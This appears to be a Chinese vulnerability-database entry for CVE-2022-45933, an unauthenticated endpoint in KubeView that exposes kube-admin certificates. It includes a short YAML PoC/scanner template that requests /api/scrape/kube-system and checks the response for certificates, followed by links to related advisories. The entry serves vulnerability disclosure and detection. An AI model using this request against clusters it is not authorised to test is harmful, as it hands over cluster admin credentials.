CVE-2022-45933: KubeView 未授权访问漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2022-45933

info:
  name: KubeView 未授权访问漏洞
  author: Lay0us1
  severity: medium
  verified: true
  description: KubeView 0.1.31之前的版本存在安全漏洞，该漏洞源于其api/ scraper /kube-system不需要身份验证，并检索可以作为kube-admin进行身份验证的证书文件允许攻击者获得Kubernetes集群的控制权。
  reference:
    - https://mp.weixin.qq.com/s/uAb1L0o8ApNS44bvnlOeGQ

rules:
    r0:
        request:
            method: GET
            path: /api/scrape/kube-system
        expression: |
            response.status == 200 && response.body.bcontains(b'BEGIN CERTIFICATE') && response.body.bcontains(b'END CERTIFICATE') && response.body.bcontains(b'kubernetes.io')
expression: r0()

相关漏洞推荐

• CVE-2022-45933: KubeView <=0.1.31 - Information Disclosure POC

  2025-08-01 | KubeView
  KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of ...

• KubeView敏感信息泄露(CVE-2022-45933) 无POC

  2023-01-18 | KubeView
  KubeView通过0.1.31允许攻击者获得Kubernetes集群的控制权，因为api/ scratch/kube-system不需要身份验证，并作为kube-admin检索可用于身份验证的证书文...

• KubeView 访问控制错误漏洞 无POC

  2022-11-27 | KubeView
  KubeView是Ben Coleman个人开发者的一个 Kubernetes 集群可视化器和图形浏览器。 KubeView 0.1.31之前的版本存在访问控制错误漏洞，该漏洞源于其api/ scra...

• Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

  2025-09-05 | Webmin
  Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.997之前的版本存在安全漏洞，该漏洞源于其software/apt-lib.pl组件缺少对U...

• CVE-2022-0342: Zyxel authentication bypass patch analysis POC

  2025-09-01 | Zyxel
  An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versio...